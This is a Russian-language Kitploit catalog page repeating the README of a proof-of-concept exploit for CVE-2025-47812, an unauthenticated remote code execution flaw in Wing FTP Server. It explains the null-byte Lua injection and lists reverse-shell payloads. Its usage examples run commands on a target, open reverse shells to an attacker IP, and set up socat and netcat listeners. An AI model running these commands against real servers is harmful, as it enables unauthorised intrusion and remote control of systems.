Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/havbay/cve-2025-47812-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingИнструмент Удаленного Доступа
GitHubhavbay/cve-2025-47812-poc

CVE-2025-47812-PoC

Эксплуатация неаутентифицированного удаленного выполнения кода для Wing FTP Server (CVE-2025-47812) с несколькими полезными нагрузками обратной оболочки, интерактивным и CLI режимами, а также автоматизированной обработкой сеансов.

16 месяцев назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-47812 — Удаленное выполнение кода (RCE) в Wing FTP Server

Python CVSS Type

Обзор

ПолеЗначение
CVECVE-2025-47812
ЗатрагиваемыеWing FTP Server < 7.4.4
ТипНеавторизованное удаленное выполнение кода
Оценка CVSS10.0 (Критический)
Исправлено вWing FTP Server 7.4.4

Как это работает

Уязвимость существует в конечной точке входа /loginok.html. Сервер не очищает нулевые байты (%00) в поле username. Это позволяет атакующему внедрить произвольный код Lua в файлы сессий, которые позже обрабатываются на стороне сервера при обращении к таким конечным точкам, как /dir.html, без какой-либо аутентификации.

Ссылка: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


Возможности

  • Неавторизованное выполнение команд
  • Несколько полезных нагрузок для обратного шелла (socat, bash, python3, nc-e, nc-fifo, php)
  • Приоритетная полезная нагрузка socat для полноценного интерактивного TTY
  • Предварительная проверка доступности цели
  • Автоматическое извлечение UID сессии с новой сессией для каждой попытки
  • Выбор конкретной полезной нагрузки с помощью флага --payload
  • Сохранение вывода команды в файл с помощью -o
  • Настраиваемые --timeout и --delay
  • Подробный/отладочный режим с -v
  • Элегантная обработка Ctrl+C
  • Сводка по полезным нагрузкам после попыток обратного шелла
  • Режим аргументов командной строки + интерактивное меню
  • Цветной вывод

Требования

root@kitploit:~
pip install requests

Использование

Интерактивный режим

root@kitploit:~
python3 wingftp_rce_exploit.py

Режим командной строки

root@kitploit:~
# Выполнить команду
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"

# Сохранить вывод в файл
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt

# Обратный шелл (попробовать все полезные нагрузки)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444

# Обратный шелл (конкретная полезная нагрузка)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat

Все опции

root@kitploit:~
-u / --url        Базовый URL цели
-U / --username   Имя пользователя для входа (по умолчанию: anonymous)
-c / --command    Команда для выполнения (режим команды)
-r / --rhost      Ваш IP слушателя (режим обратного шелла)
-p / --rport      Ваш порт слушателя (режим обратного шелла)
     --payload    Конкретная полезная нагрузка (см. список ниже)
     --timeout    Тайм-аут HTTP-запроса в секундах (по умолчанию: 10)
     --delay      Задержка между попытками полезной нагрузки в секундах (по умолчанию: 4)
-o / --output     Сохранить вывод команды в файл
-v / --verbose    Включить отладочный вывод

Полезные нагрузки обратного шелла

ИмяМетод
socatПолный PTY через socat
bashПеренаправление /dev/tcp
python3Подпроцесс сокета
nc-eNetcat с флагом -e
nc-fifoNetcat + mkfifo
phpPHP fsockopen

Примеры

Выполнение команды

root@kitploit:~
Целевой URL : http://192.168.1.10:5466
Имя пользователя : anonymous
Выбор        : 1
Команда      : whoami

Обратный шелл

Шаг 1 — Запустите ваш слушатель (рекомендуется socat для полного TTY):

root@kitploit:~
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr

Или с помощью nc:

root@kitploit:~
nc -lvnp 4444

Шаг 2 — Запустите эксплойт:

root@kitploit:~
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444

Благодарности

  • Оригинальный PoC от blindma1den
  • Улучшено и расширено Havbuy

Отказ от ответственности

Этот инструмент предназначен исключительно для образовательных целей и авторизованного тестирования безопасности.
НЕ используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.
Несанкционированное использование является незаконным. Авторы не несут ответственности за неправомерное использование.

Скачать инструмент